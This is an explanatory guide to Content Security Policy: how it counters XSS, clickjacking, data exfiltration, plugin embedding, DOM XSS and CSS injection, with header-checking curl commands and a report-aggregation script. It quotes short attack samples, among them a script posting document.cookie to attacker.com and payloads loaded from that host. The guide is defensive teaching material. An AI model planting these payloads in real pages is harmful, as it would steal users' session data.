Content Security Policy (CSP) Explanation
What is Content Security Policy?
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware.
CSP is implemented by sending a Content-Security-Policy HTTP response header that declares, directive by directive, which sources the browser may load content from on that page. A policy can also be delivered in a <meta http-equiv="Content-Security-Policy"> element, but frame-ancestors, report-uri and sandbox are ignored there, so the header is the delivery method to prefer.
Why is CSP Important?
- Mitigates XSS by restricting which scripts may execute: an injected inline script, or a script from a host not on the allow list, is blocked even when the injection itself succeeds
- Prevents unauthorized resource loading (images, styles, fonts, frames, plugins, fetch/XHR targets) from sources not on the allow list
- Protects against clickjacking through the frame-ancestors directive, which controls which origins may embed the page
- Can report violations to an endpoint (report-to, or the older report-uri) so the policy can be monitored and refined before and after enforcement
CSP Examples
CSP Attack Examples and Mitigations
Understanding common attack vectors and how CSP mitigates them is essential for writing a policy that is strict where it matters. CSP is a second line of defence: it limits what an injected payload can do, but it does not remove the injection flaw itself, so output encoding and input validation remain necessary. Here are the key attack types and how CSP helps against each:
Cross-Site Scripting (XSS)
An attacker injects a malicious script into a trusted website, and the browser executes it with the user's session and privileges.
Attack Example:
<script>alert('XSS');</script>
CSP Mitigation:
script-src 'self'; object-src 'none';
With no 'unsafe-inline' in script-src, the injected inline script is blocked even though the injection succeeded; inline scripts the page legitimately needs must then carry a nonce or be allowed by hash.
Test Command:
curl -sI https://vulnerable-site.com | grep -i '^content-security-policy'
The policy is only effective if script-src (or default-src, when script-src is absent) contains no 'unsafe-inline', no '*' and no data: source. A curl request cannot exercise the XSS itself; it can only confirm that the header is present and strict.
Clickjacking
An attacker embeds the target site in an invisible frame on a page they control and tricks the user into clicking on something different from what the user perceives, causing unwanted actions in the user's authenticated session.
Attack Example:
<iframe src='https://vulnerable-site.com' style='opacity:0;position:absolute;'></iframe>
CSP Mitigation:
frame-ancestors 'none';
Use 'self' instead of 'none' if the site frames its own pages. frame-ancestors is honored only in the HTTP header, not in a meta tag, and it takes precedence over X-Frame-Options when both are present; keep X-Frame-Options: DENY as well for browsers that predate CSP level 2.
Test Command:
curl -sI https://vulnerable-site.com | grep -iE '^(content-security-policy|x-frame-options)'
A response that carries neither a frame-ancestors directive nor X-Frame-Options can be framed by any origin.
Data Exfiltration
An attacker who has already gained script execution on the page uses it to send session data or page content to a server they control, without the user's knowledge.
Attack Example:
<script>fetch('https://attacker.com/steal', { method: 'POST', body: document.cookie });</script>
CSP Mitigation:
connect-src 'self';
connect-src governs fetch(), XMLHttpRequest, WebSocket, EventSource and sendBeacon(). It does not stop a script from leaking data through an image request or a form submission, so img-src, form-action and the other fetch directives need the same restriction, and script-src remains the primary control because it prevents the script from running at all. Marking the session cookie HttpOnly keeps it out of document.cookie regardless of CSP.
Test Command:
curl -sI https://vulnerable-site.com | grep -i '^content-security-policy' | grep -io 'connect-src [^;]*'
An absent connect-src falls back to default-src; if neither is present, scripts may connect anywhere.
Malicious Plugin
A malicious browser extension runs with the browser's own privileges and can strip or rewrite response headers, including Content-Security-Policy; CSP offers no protection against an extension the user has installed. What CSP does control is plugin content the page itself embeds through <object> or <embed>, which historically let attackers run Flash or Java payloads that script-src did not cover.
Attack Example:
<object data="https://attacker.com/payload.swf" type="application/x-shockwave-flash"></object>
CSP Mitigation:
object-src 'none';
plugin-types, which restricted embedded content to listed MIME types (for example plugin-types application/pdf), is deprecated and no longer supported by current browsers; object-src 'none' is the directive to rely on, and a modern site should not need plugin content at all.
Test Command:
curl -sI https://vulnerable-site.com | grep -i '^content-security-policy' | grep -io 'object-src [^;]*'
If object-src is absent it falls back to default-src, so a policy with neither leaves <object> and <embed> unrestricted.
DOM-based XSS
An attacker exploits client-side script that copies attacker-controlled input (a source such as location.hash) into a dangerous DOM sink (such as innerHTML) without sanitization, so the payload never passes through the server.
Attack Example:
// source -> sink: the URL fragment is written into the page as HTML
element.innerHTML = location.hash.substring(1);
CSP Mitigation:
script-src 'self'; object-src 'none'; base-uri 'self';
An injected <img src=x onerror=alert(1)> is an inline event handler, which script-src blocks because 'unsafe-inline' is absent. For the sink itself, require-trusted-types-for 'script' (Trusted Types, supported in Chromium-based browsers) makes string assignment to innerHTML and similar sinks throw unless the value passes a Trusted Types policy. base-uri 'self' stops an injected <base> tag from redirecting the page's relative script URLs.
Test Command:
curl -sI https://vulnerable-site.com | grep -i '^content-security-policy'
curl cannot trigger DOM XSS: the URL fragment is never sent to the server, and the vulnerable code runs only in a browser. To test, open the page with a payload in the fragment while the browser's DevTools console is open and confirm that a CSP violation is logged instead of the script executing.
CSS Injection
An attacker injects CSS, either as an external stylesheet or as an inline <style> block, to restyle the page for phishing or to exfiltrate data: attribute selectors that match one character of a field value at a time can each trigger a background-image request to the attacker's server.
Attack Example:
<link rel="stylesheet" href="https://attacker.com/malicious.css">
CSP Mitigation:
style-src 'self';
This blocks both the external stylesheet and an injected <style> element, since 'unsafe-inline' is absent (inline style attributes are blocked as well). Because CSS exfiltration needs an outbound request, restricting img-src and font-src to 'self' closes that channel too.
Test Command:
curl -sI https://vulnerable-site.com | grep -i '^content-security-policy' | grep -io 'style-src [^;]*'
As with the other fetch directives, style-src falls back to default-src when absent.
Interactive CSP Builder
Create and customize your Content Security Policy. The builder's default output allows only same-origin resources and forbids plugin content:
Generated CSP Header:
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'; img-src 'self'; connect-src 'self'; font-src 'self'; object-src 'none'; media-src 'self'; frame-src 'self'; worker-src 'self'; manifest-src 'self'; form-action 'self'
Two directives are worth adding before deployment: base-uri and frame-ancestors do not fall back to default-src, so without base-uri 'self' an injected <base> tag can redirect relative script URLs, and without frame-ancestors 'none' (or 'self') the page can still be framed.
CSP Tester
Test the Content Security Policy of any website: fetch its response headers and look for 'unsafe-inline' or 'unsafe-eval' in script-src, wildcard or data: sources, and missing object-src, base-uri and frame-ancestors directives.
Implementing CSP
- Identify the resources your site needs to load (scripts, styles, images, fonts, fetch/XHR endpoints, frames) and the origins they come from
- Write a policy that allows only those sources, and include object-src 'none' and base-uri 'self' regardless of need
- Deploy it first as Content-Security-Policy-Report-Only, which reports violations without blocking anything, with report-to (and report-uri for older browsers) pointing at an endpoint you control
- Review the violation reports, fix the pages that would break or add the missing legitimate sources, and repeat until the reports are clean
- Switch the header to Content-Security-Policy to enforce it, and keep collecting reports to catch regressions and real attacks
CSP Best Practices
- Start with a strict policy and add sources only where reports show a real need; do not start from 'unsafe-inline' or '*' and try to tighten later
- Use nonces or hashes for inline scripts and styles instead of 'unsafe-inline', and avoid 'unsafe-eval'; a nonce-based script-src combined with 'strict-dynamic' lets approved scripts load their own dependencies without listing every CDN
- Always set object-src 'none' and base-uri 'self' (or 'none') explicitly; base-uri in particular does not inherit from default-src
- Regularly review and update your CSP to accommodate new features and third-party integrations
- Monitor violations with report-to (together with a Reporting-Endpoints header) and keep report-uri for browsers that lack it; adjust the policy from the reports, and watch for reports that reveal an attack rather than a misconfiguration
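The rollout steps and the monitoring advice above both depend on reading violation reports well: most reports are legitimate sources you forgot, some are browser-extension noise, and a few are attacks. The following added example (written for this page; it is not the page's own tooling or code from any project) normalizes both report formats a browser can send, drops extension noise, groups the rest by directive and blocked origin, and attaches the policy change each group calls for. The sample reports are constructed for the example, not captured from a real site.

```javascript
// Added example: aggregate CSP violation reports into policy decisions.
// Not code from the original page. SAMPLE_REPORTS below are constructed.

// Schemes that produce reports without indicating a gap in the policy.
const NOISE_SCHEMES = new Set(['chrome-extension', 'moz-extension', 'safari-extension',
  'safari-web-extension', 'ms-browser-extension', 'about', 'chrome']);

// Accept the legacy report-uri body ({"csp-report": ...}) and the Reporting
// API body ({"type": "csp-violation", "body": ...}) delivered via report-to.
function normalizeReport(report) {
  const legacy = report['csp-report'];
  if (legacy) {
    return {
      directive: legacy['effective-directive'] || legacy['violated-directive'].split(' ')[0],
      blocked: legacy['blocked-uri'] || '',
      document: legacy['document-uri'],
    };
  }
  if (report.type === 'csp-violation' && report.body) {
    const b = report.body;
    return { directive: b.effectiveDirective, blocked: b.blockedURL || '', document: b.documentURL };
  }
  return null;
}

// Reduce blocked-uri to the thing a policy change would reference.
function classify(blocked) {
  if (blocked === 'inline' || blocked === 'self') return { kind: 'inline' }; // older Firefox reported 'self'
  if (blocked === 'eval') return { kind: 'eval' };
  if (!blocked.includes(':')) return { kind: 'scheme', scheme: blocked };   // Chrome legacy: 'data', 'chrome-extension'
  try {
    const u = new URL(blocked);
    const scheme = u.protocol.slice(0, -1);
    return u.origin === 'null' ? { kind: 'scheme', scheme } : { kind: 'origin', origin: u.origin };
  } catch {
    return { kind: 'scheme', scheme: blocked.split(':')[0] };
  }
}

// The remediation each kind of violation calls for.
function advise(directive, c) {
  switch (c.kind) {
    case 'inline': return `move inline code into a file or give it a nonce/hash; do not add 'unsafe-inline' to ${directive}`;
    case 'eval':   return `remove eval()/new Function(); do not add 'unsafe-eval' to ${directive}`;
    case 'scheme': return `${c.scheme}: blocked in ${directive}; allow a scheme only if unavoidable, never for script-src`;
    default:       return `if this load is expected, add ${c.origin} to ${directive}; otherwise treat it as an injection`;
  }
}

// Group reports by (directive, what was blocked), drop extension noise,
// and return the groups most frequent first with a remediation hint.
function summarize(rawReports) {
  const groups = new Map();
  for (const raw of rawReports) {
    const r = normalizeReport(raw);
    if (!r) continue;
    const c = classify(r.blocked);
    if (c.kind === 'scheme' && NOISE_SCHEMES.has(c.scheme)) continue;
    const what = c.kind === 'origin' ? c.origin : c.kind === 'scheme' ? `${c.scheme}:` : c.kind;
    const key = `${r.directive} ${what}`;
    const g = groups.get(key) ?? { key, directive: r.directive, count: 0, advice: advise(r.directive, c) };
    g.count += 1;
    groups.set(key, g);
  }
  return [...groups.values()].sort((a, b) => b.count - a.count);
}

// Constructed sample: what a report endpoint might receive after enabling
// Content-Security-Policy-Report-Only on vulnerable-site.com.
const SAMPLE_REPORTS = [
  { 'csp-report': { 'document-uri': 'https://vulnerable-site.com/', 'violated-directive': 'script-src',
      'effective-directive': 'script-src', 'blocked-uri': 'https://cdn.example.com/lib.js', 'disposition': 'report' } },
  { 'csp-report': { 'document-uri': 'https://vulnerable-site.com/login', 'violated-directive': 'script-src',
      'effective-directive': 'script-src', 'blocked-uri': 'https://cdn.example.com/analytics.js', 'disposition': 'report' } },
  { 'csp-report': { 'document-uri': 'https://vulnerable-site.com/', 'violated-directive': 'script-src',
      'effective-directive': 'script-src', 'blocked-uri': 'inline', 'disposition': 'report' } },
  { 'csp-report': { 'document-uri': 'https://vulnerable-site.com/', 'violated-directive': 'script-src',
      'effective-directive': 'script-src', 'blocked-uri': 'chrome-extension', 'disposition': 'report' } },
  { type: 'csp-violation', body: { documentURL: 'https://vulnerable-site.com/', effectiveDirective: 'connect-src',
      blockedURL: 'https://attacker.com/steal', disposition: 'report' } },
];
```

On the sample, summarize(SAMPLE_REPORTS) yields three groups: the CDN scripts (two reports, a legitimate source to add), one inline script (fix with a nonce, not 'unsafe-inline'), and one connect-src violation to attacker.com, which is the kind of report to investigate rather than allow. The extension report is discarded.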